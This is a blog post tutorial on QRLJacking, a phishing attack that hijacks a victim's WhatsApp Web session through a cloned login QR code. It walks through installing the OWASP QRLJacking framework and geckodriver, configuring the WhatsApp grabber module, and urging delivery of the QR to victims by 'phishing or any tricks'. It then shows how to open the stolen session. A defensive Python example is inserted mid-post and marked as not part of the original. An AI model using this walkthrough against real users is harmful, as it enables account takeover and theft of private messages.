QRL Jacking

Sumanth Dodda
Jun 8, 2021

WhatsApp Hijacking

QR code (abbreviated from Quick Response Code) is the trademark for a type of matrix barcode. QRLJacking, or Quick Response Code Login Jacking, is a simple social engineering attack vector capable of session hijacking. It affects all applications that rely on the “Login with QR code” feature as a secure way to log in to accounts.

In a nutshell, the victim scans the attacker’s QR code, which results in session hijacking: we steal everything the WhatsApp Web application needs to load.

Overview
  1. The attacker initializes a client-side QR session and clones the login QR code into a phishing website: “Now a well-crafted phishing page with a valid and regularly updated QR Code is ready to be sent to a Victim.”
  2. The attacker sends the phishing page to the victim. (A lot of efficient attack vectors are going to be clarified later in the paper.)
  3. The victim scans the QR code with a specific targeted mobile app.
  4. The attacker gains control over the victim’s account.
  5. The service exchanges all the victim’s data with the attacker’s session.
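
A server-side counter to the flow above, as an added example that is not part of the original post or of the QRLJacking project: the service binds each QR session to the browser that requested it and asks the phone user to confirm when the scan arrives from a different network. The function names, the 20-second lifetime, the /24 and /64 comparison and the sample addresses are assumptions chosen for illustration.

```python
import secrets
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

QR_TTL_SECONDS = 20  # assumed lifetime of one QR code before it is rotated


@dataclass
class QrSession:
    token: str         # random value encoded in the QR code
    browser_ip: str    # address of the browser that requested the QR code
    issued_at: float   # issue time, seconds since the epoch


def issue_qr_session(browser_ip: str, now: float) -> QrSession:
    """Create a login session bound to the browser that asked for the QR."""
    return QrSession(secrets.token_urlsafe(32), browser_ip, now)


def same_network(a: str, b: str) -> bool:
    """True when both addresses share a /24 (IPv4) or /64 (IPv6) prefix."""
    ip_a, ip_b = ip_address(a), ip_address(b)
    if ip_a.version != ip_b.version:
        return False
    prefix = 24 if ip_a.version == 4 else 64
    return ip_b in ip_network(f"{ip_a}/{prefix}", strict=False)


def evaluate_scan(session: QrSession, phone_ip: str, now: float,
                  user_confirmed: bool = False) -> str:
    """Decide what to do when the mobile app scans the QR code."""
    # Expiry alone does not stop QRLJacking: the phishing page keeps
    # re-cloning fresh codes, so a short lifetime only limits stale ones.
    if now - session.issued_at > QR_TTL_SECONDS:
        return "expired"
    # In the attack the QR session belongs to the attacker's browser, so the
    # scanning phone is usually on an unrelated network. Ask the user to
    # confirm, showing the browser's address and location in the app.
    if not same_network(session.browser_ip, phone_ip) and not user_confirmed:
        return "needs_confirmation"
    return "approved"


if __name__ == "__main__":
    # Constructed sample: documentation-range addresses, fixed clock values.
    s = issue_qr_session("203.0.113.10", now=1000.0)
    print(evaluate_scan(s, "198.51.100.7", now=1005.0))
    print(evaluate_scan(s, "203.0.113.77", now=1005.0))
```

A phone on mobile data and a browser on Wi-Fi will also differ legitimately, which is why the mismatch leads to a confirmation prompt rather than a refusal.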

Installation Process:

Requirements:

  • Linux or macOS
  • Python 3.7+
  • Firefox Web Browser

Step 1: Download/clone the QRLJacking framework from GitHub

Command: git clone https://github.com/OWASP/QRLJacking.git

You can also download the ZIP and extract it.

Move into the directory by using

Step 2: Install all the required modules using pip

pip is a package management system written in Python, used to install and manage software packages.

Command: python3 -m pip install -r requirement.txt

Step 3: Install geckodriver

This program provides the HTTP API described by the WebDriver protocol to communicate with Gecko browsers, such as Firefox.

Install the latest geckodriver from https://github.com/mozilla/geckodriver/releases

Let's automate things:

Commands:

  • wget https://github.com/mozilla/geckodriver/releases/download/v0.29.1/geckodriver-v0.29.1-linux64.tar.gz
  • tar -zxvf geckodriver-v0.29.1-linux64.tar.gz
  • chmod +x geckodriver
  • sudo mv -f geckodriver /usr/local/share/geckodriver
  • sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
  • sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver

Step 4: Starting and configuring QRLJacker

Start the QRLJacker script: python3 QrlJacker.py

The banner may vary from time to time ;)

Step 5: Configuring the WhatsApp module and listener

Commands:

  • use grabber/whatsapp
  • set port 2001
  • set host 127.0.0.1

Step 6: Open Firefox and Scan the QR

Open your Firefox browser and type in http://host:port

  • http://127.0.0.1:2001

QR code that has to be scanned in the WhatsApp app

Make sure that the victim scans the QR; you can use phishing or any tricks to deliver this QR to the victim.

Step 7: After scanning and usage

I personally scanned this QR; after scanning, you may get a message as shown below:

session has been saved successfully

Commands to interact and use

  • sessions

The sessions command shows the active connections available to interact with.

  • sessions -i 0

The sessions -i <number> command lets us interact with a session and opens the victim's WhatsApp directly in Firefox.

My WhatsApp

I also recorded this part, but the gecko installation part isn’t available in that recording: G drive URL

You can explore this tool at:

Thank you very much for making it up to here — Cyber might
